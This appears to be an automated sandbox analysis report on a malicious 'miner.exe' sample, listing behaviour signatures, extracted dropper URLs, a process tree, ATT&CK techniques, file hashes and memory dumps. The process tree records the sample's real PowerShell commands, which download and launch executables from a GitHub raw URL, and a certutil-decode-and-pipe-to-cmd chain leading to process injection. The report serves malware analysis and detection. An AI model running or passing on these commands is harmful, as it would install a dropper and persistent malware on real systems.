Overview

overview

10

Static

static

mine_aeternity.bat

windows7_x64

1

mine_aeternity.bat

windows10_x64

1

mine_aion.bat

windows7_x64

1

mine_aion.bat

windows10_x64

1

mine_beam.bat

windows7_x64

1

mine_beam.bat

windows10_x64

1

mine_btcz.bat

windows7_x64

1

mine_btcz.bat

windows10_x64

1

mine_btg.bat

windows7_x64

1

mine_btg.bat

windows10_x64

1

mine_grin29.bat

windows7_x64

1

mine_grin29.bat

windows10_x64

1

mine_grin31.bat

windows7_x64

1

mine_grin31.bat

windows10_x64

1

mine_mnx.bat

windows7_x64

1

mine_mnx.bat

windows10_x64

1

mine_swap.bat

windows7_x64

1

mine_swap.bat

windows10_x64

1

mine_zero.bat

windows7_x64

1

mine_zero.bat

windows10_x64

1

miner.exe

windows7_x64

10

miner.exe

windows10_x64

10

Analysis

  • max time kernel
    80s
  • max time network
    117s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-01-2021 15:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    miner.exe

  • Size

    17.2MB

  • MD5

    adf909a4715a421cd8c683016e75d40a

  • SHA1

    51f6dc871ec6bd0b8296e5d631287d425aa3270d

  • SHA256

    138b049541b36ea37d12b9ef3f684aa5e99315e0ce5137e0bea89d39718faefe

  • SHA512

    a2fff627245ad394fb68bc53f7b163b94b7dc950e23a6c3aedb14453cda858468f76aec32a74ba2034d169f69798b13a201b11cf939294690d7a16c7e3565073

Score
10/10
persistence

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/7gds/f/main/bild.exe
exe.dropper

https://raw.githubusercontent.com/7gds/f/main/miner.exe

Signatures

  • Executes dropped EXE 3 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\miner.exe
    "C:\Users\Admin\AppData\Local\Temp\miner.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/7gds/f/main/bild.exe,https://raw.githubusercontent.com/7gds/f/main/miner.exe -Destination Ga.exe,FZ.exe;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2452
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command Start-Process Ga.exe; Start-Process FZ.exe;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4088
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ga.exe
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ga.exe"
        3⤵
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2632
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c zoau
          4⤵
            PID:2640
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c certutil -decode Fanciulla.vsdx No.vsd & cmd < No.vsd
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2696
            • C:\Windows\SysWOW64\certutil.exe
              certutil -decode Fanciulla.vsdx No.vsd
              5⤵
                PID:3760
              • C:\Windows\SysWOW64\cmd.exe
                cmd
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2504
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 1 TDxbNZn.TDxbNZn
                  6⤵
                  • Runs ping.exe
                  PID:2836
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V /R "^aNibFyNpwOdxIgFEyvs$" Violenza.adts
                  6⤵
                    PID:3924
                  • C:\Windows\SysWOW64\certutil.exe
                    certutil -decode Uno.aiff M
                    6⤵
                      PID:3932
                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.com
                      dllhost.com M
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2768
                      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.com
                        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.com M
                        7⤵
                        • Executes dropped EXE
                        • Drops startup file
                        • Suspicious use of SetThreadContext
                        • Suspicious use of WriteProcessMemory
                        PID:1204
                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:2976
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ScmGBJCGXfrU.bat" "
                            9⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4076
                            • C:\Windows\SysWOW64\chcp.com
                              chcp 65001
                              10⤵
                                PID:3756
                              • C:\Windows\SysWOW64\PING.EXE
                                ping -n 10 localhost
                                10⤵
                                • Runs ping.exe
                                PID:3184
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 30
                        6⤵
                        • Runs ping.exe
                        PID:2228
                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\FZ.exe
                  "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\FZ.exe"
                  3⤵
                    PID:2736

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              Defense Evasion

              Modify Registry

              1
              T1112

              Credential Access

              Discovery

              Remote System Discovery

              1
              T1018

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                MD5

                6ed4b3d25a6f22e8dcef5167080ceb75

                SHA1

                b953ecc8de151b85f0b64784235a924b609582ca

                SHA256

                d4e932b7151d03a034cc4c0567082d2390fc791dc95b2a4d9a0623acbf4d2384

                SHA512

                80ef5c4be3611238fb1f15561fd1ae8101482e8b94897be141a0d9728851bc6edf3c497a619acef7ff481a5e45b24df5584b32979d9006cc2c1e61fd2aed9d9b

                Download Submit
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                MD5

                a99d873b613e7ffb4619175b0eeb1151

                SHA1

                ede19a16512734d08a26364a3d0ec80e2dcd8a57

                SHA256

                de4502bec8594be4d323b5d60f5192c0091cc81f626a070fd85c944170a5480d

                SHA512

                e4bf0a5a8fcaaa95939bcc88794b15af4eec50f81057645e2582e85863dd3c2beac527df561edb9e2e26acfd154055a714a52fed7a70c7454f63747a46183130

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Fame.potm
                MD5

                8fb2119be08795087f46cde79f703c27

                SHA1

                6b517b969be5dbc0517fc370ef974181b00b4e94

                SHA256

                a640ba1bcd86eba73c1690d1bf5268862bdf6d3198eeb37a6a31fefee51e3540

                SHA512

                c2d6f8d8726c14c9a384db9c3a7a607615bab42c4ee740e8a3e8ec0e1be5dd437fb0074bb71a5ed568e41c5c0492a95fbaa2d939e481d8c08dde5eaa6b668dce

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Fanciulla.vsdx
                MD5

                0890b9e8cf55dfb2915ffcca9c687168

                SHA1

                eee6d6409b5597c44f2ca4355f338a69bbbcb753

                SHA256

                98ba51075947691ddb073d73165b9935f84703d7022ec5c4fa89a5c9604abc57

                SHA512

                defbdc287410863f7872d775e84201a3d24d5ad82bfe1f7f4559ac3e84d496a2d386adb260d6593882fe83ee2e5b06ade5908025f2341c474a5af5b8fc5d3dd6

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\M
                MD5

                ddd4e36ab1e32b48a2db44936c52422b

                SHA1

                f5654f0a9c0cf10bacdd83c898e824c0d4db29f9

                SHA256

                32de9dc4666712a59dfcabd217f61848536cad6f50a5b3c3f02965981852c7cf

                SHA512

                e004bf61a556d62f1cff981d90345e6b0e1b3bca49798997db8066889e489bb78fc896e6d900b1293efe4352854a96e0eee77f386ab1ae090be95ce42bb6449d

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\No.vsd
                MD5

                60707e6258a397a307e7ef35142cde67

                SHA1

                a10db4c514f59e8af52c4d16d9e9231db94c3840

                SHA256

                481ee504119cf56b3260f7d59777034aa9e643c329552f954ecf33207564ef0d

                SHA512

                3ba94c008d2b7a473456ca689eb051e2e1c21fa89cf64eeed3856f0c08a7c262a480c73a6d7f3deb7bc5d2c5671c1c9f0796b581cfbd4cb0d51728dbf82890bd

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe
                MD5

                b58b926c3574d28d5b7fdd2ca3ec30d5

                SHA1

                d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

                SHA256

                6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

                SHA512

                b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe
                MD5

                b58b926c3574d28d5b7fdd2ca3ec30d5

                SHA1

                d260c4ffd603a9cfc057fcb83d678b1cecdf86f9

                SHA256

                6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3

                SHA512

                b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Uno.aiff
                MD5

                0d326c2f2aeb68e5650aa38ec7ef2ea4

                SHA1

                d26183f60e5ddcfd46edcdb633635c1ebec9112c

                SHA256

                750c93b96f30147beb049ad338fcdaf16258e84ea18ad37cd08f8b2584e972c5

                SHA512

                13cda00fefc2b763f8b592a26b5fdf36b2e9c3ebbf44e85708911a4546801fb873e34a30b17cd4aea6e3326abed1faf2bc35a2855920c426d575abccd92db056

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Violenza.adts
                MD5

                0d85157f5c70db7481e64f42e808d965

                SHA1

                0a8258f1d5003abb704120dfb8633a85f808192a

                SHA256

                6887bf59a3cad6476085ba0d1e1d00d5dfa07c8f838d45c20a197d06d34e3c8f

                SHA512

                3a894547da1bbb2f0adca87582da380be49ba184cc49e8821d910bcfffa5bf1c37283865ea187b33344dce9356d06a9aa1fcd33f249fd2827e74853e2a0b85ed

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.com
                MD5

                78ba0653a340bac5ff152b21a83626cc

                SHA1

                b12da9cb5d024555405040e65ad89d16ae749502

                SHA256

                05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

                SHA512

                efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.com
                MD5

                78ba0653a340bac5ff152b21a83626cc

                SHA1

                b12da9cb5d024555405040e65ad89d16ae749502

                SHA256

                05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

                SHA512

                efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dllhost.com
                MD5

                78ba0653a340bac5ff152b21a83626cc

                SHA1

                b12da9cb5d024555405040e65ad89d16ae749502

                SHA256

                05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7

                SHA512

                efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\ScmGBJCGXfrU.bat
                MD5

                4649e4b11ec54d2e660af409bcd58d72

                SHA1

                10769187705f94826dcc4c1e0298da5718fe7efc

                SHA256

                18f47bba5810711a937a39e04f2a4b9fe42c9a96ac6185641f25e5ce2fbf6a8f

                SHA512

                8f116d8a40019d15fa35497bfee47f2fa697d56848ba801d60a19dcd5669fb5e9d1412fce98a1b3cbefcd7a45d389067ad61866067ee97ad3373fb8f1b07b370

                Download Submit
              • C:\Users\Admin\AppData\Roaming\Logs\01-18-~1
                MD5

                684cfd2201ee29f981a67aeb5cac6c72

                SHA1

                c8d6437abcddd0145505f8e245668fe1b4d3afd2

                SHA256

                a92f02ebde24decb559b764603f483ac2d0fb8552698636d0c789fe6cee57c51

                SHA512

                561fca6d6e5f0148a2c54b2149ddee44247afec41028d0b687448bde349dce7de1f520851991bbc673278184206416239b02e3e9cf4f70ec698d5f577b47f5ca

                Download Submit
              • memory/1204-74-0x0000000000000000-mapping.dmp
                Download
              • memory/1204-78-0x00000000017D0000-0x00000000017D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2228-72-0x0000000000000000-mapping.dmp
                Download
              • memory/2452-19-0x0000000009850000-0x0000000009851000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-13-0x0000000008810000-0x0000000008811000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-3-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

                Download
              • memory/2452-20-0x0000000009CE0000-0x0000000009CE1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-7-0x00000000079D0000-0x00000000079D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-2-0x0000000000000000-mapping.dmp
                Download
              • memory/2452-8-0x0000000007B70000-0x0000000007B71000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-4-0x0000000005330000-0x0000000005331000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-9-0x0000000007680000-0x0000000007681000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-10-0x0000000007682000-0x0000000007683000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-6-0x0000000007930000-0x0000000007931000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-11-0x00000000083F0000-0x00000000083F1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-12-0x0000000007C20000-0x0000000007C21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-15-0x0000000009B20000-0x0000000009B21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-5-0x0000000007CC0000-0x0000000007CC1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-16-0x00000000097B0000-0x00000000097B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-21-0x0000000007683000-0x0000000007684000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-17-0x0000000009810000-0x0000000009811000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-18-0x000000000A0C0000-0x000000000A0C1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2452-14-0x0000000008B20000-0x0000000008B21000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2504-64-0x0000000000000000-mapping.dmp
                Download
              • memory/2632-57-0x0000000000000000-mapping.dmp
                Download
              • memory/2640-59-0x0000000000000000-mapping.dmp
                Download
              • memory/2696-60-0x0000000000000000-mapping.dmp
                Download
              • memory/2736-58-0x0000000000000000-mapping.dmp
                Download
              • memory/2768-70-0x0000000000000000-mapping.dmp
                Download
              • memory/2836-65-0x0000000000000000-mapping.dmp
                Download
              • memory/2976-89-0x0000000006270000-0x0000000006271000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2976-80-0x0000000001020000-0x000000000106E000-memory.dmp
                Filesize

                312KB

                Download
              • memory/2976-82-0x00000000729A0000-0x000000007308E000-memory.dmp
                Filesize

                6.9MB

                Download
              • memory/2976-86-0x00000000055C0000-0x00000000055C1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2976-87-0x00000000055B0000-0x00000000055B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2976-90-0x0000000006660000-0x0000000006661000-memory.dmp
                Filesize

                4KB

                Download
              • memory/2976-91-0x00000000069D0000-0x00000000069D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3184-95-0x0000000000000000-mapping.dmp
                Download
              • memory/3756-94-0x0000000000000000-mapping.dmp
                Download
              • memory/3760-61-0x0000000000000000-mapping.dmp
                Download
              • memory/3924-66-0x0000000000000000-mapping.dmp
                Download
              • memory/3932-68-0x0000000000000000-mapping.dmp
                Download
              • memory/4076-92-0x0000000000000000-mapping.dmp
                Download
              • memory/4088-49-0x0000000009520000-0x0000000009521000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-51-0x000000007ED40000-0x000000007ED41000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-52-0x0000000006CF3000-0x0000000006CF4000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-50-0x0000000009680000-0x0000000009681000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-53-0x00000000097E0000-0x00000000097E1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-42-0x0000000009540000-0x0000000009573000-memory.dmp
                Filesize

                204KB

                Download
              • memory/4088-55-0x00000000097D0000-0x00000000097D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-35-0x0000000006CF2000-0x0000000006CF3000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-34-0x0000000006CF0000-0x0000000006CF1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4088-24-0x00000000731E0000-0x00000000738CE000-memory.dmp
                Filesize

                6.9MB

                Download
              • memory/4088-22-0x0000000000000000-mapping.dmp
                Download